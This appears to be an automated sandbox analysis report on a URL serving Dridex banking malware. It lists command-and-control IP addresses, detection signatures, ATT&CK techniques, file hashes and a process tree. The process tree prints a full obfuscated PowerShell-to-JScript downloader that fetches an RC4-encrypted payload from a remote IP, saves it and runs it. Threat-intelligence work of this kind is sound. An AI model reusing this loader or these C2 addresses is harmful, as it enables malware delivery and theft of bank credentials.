Overview

overview

10

Static

static

URLScan

urlscan

http://zero.testtrac...

windows10_x64

10

Analysis

  • max time kernel
    91s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-02-2021 23:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://zero.testtrack.xyz/

  • Sample

    210208-8p35lpcy1j

Score
10/10
dridex10111botnetcryptonediscoveryevasionloaderpackerransomwaretrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

51.68.224.245:4646

188.165.17.91:8443

173.255.246.77:691
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

    botnetloader
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Program crash 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 18 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://zero.testtrack.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1028 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:648
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== 1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\SysWOW64\wscript.exe
            wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=&XTBMeA&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5&vSerGMTI1Mg== 1
            5⤵
            • Blocklisted process makes network request
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c pogps.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:636
              • C:\Users\Admin\AppData\Local\Temp\pogps.exe
                pogps.exe
                7⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:208
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 2424
        3⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    88acae3e364010e82fb022c29ab69c9d

    SHA1

    043f08caaf36d317c60977dd9bdaa2be62ed54a0

    SHA256

    f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

    SHA512

    38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\pogps.exe
    MD5

    ef10edc180a8e7ccf3240bbb5a73d08b

    SHA1

    b5acf4ab8d560d36d96e91419ba79f1eff6089cc

    SHA256

    f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0

    SHA512

    33fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\pogps.exe
    MD5

    ef10edc180a8e7ccf3240bbb5a73d08b

    SHA1

    b5acf4ab8d560d36d96e91419ba79f1eff6089cc

    SHA256

    f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0

    SHA512

    33fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782

    Download Submit
  • memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/208-33-0x0000000000670000-0x00000000006AC000-memory.dmp
    Filesize

    240KB

    Download
  • memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/208-29-0x0000000000000000-mapping.dmp
    Download
  • memory/416-5-0x0000000004260000-0x0000000004261000-memory.dmp
    Filesize

    4KB

    Download
  • memory/416-4-0x0000000004260000-0x0000000004261000-memory.dmp
    Filesize

    4KB

    Download
  • memory/416-8-0x0000000004660000-0x0000000004661000-memory.dmp
    Filesize

    4KB

    Download
  • memory/636-28-0x0000000000000000-mapping.dmp
    Download
  • memory/648-19-0x0000000007CB0000-0x0000000007CB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-11-0x0000000006CB0000-0x0000000006CB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-16-0x0000000007620000-0x0000000007621000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-17-0x0000000006DE0000-0x0000000006DE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-18-0x0000000007DA0000-0x0000000007DA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-3-0x0000000000000000-mapping.dmp
    Download
  • memory/648-20-0x0000000008C50000-0x0000000008C51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-21-0x0000000008950000-0x0000000008951000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-22-0x0000000008BB0000-0x0000000008BB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-23-0x00000000091F0000-0x00000000091F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-7-0x000000006EE50000-0x000000006F53E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/648-9-0x0000000006970000-0x0000000006971000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-14-0x00000000069B0000-0x00000000069B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-27-0x00000000069B3000-0x00000000069B4000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-13-0x0000000006E50000-0x0000000006E51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-12-0x0000000006F30000-0x0000000006F31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-15-0x00000000069B2000-0x00000000069B3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/648-10-0x0000000006FF0000-0x0000000006FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/904-24-0x0000000000000000-mapping.dmp
    Download
  • memory/1568-25-0x0000000000000000-mapping.dmp
    Download
  • memory/2492-2-0x0000000000000000-mapping.dmp
    Download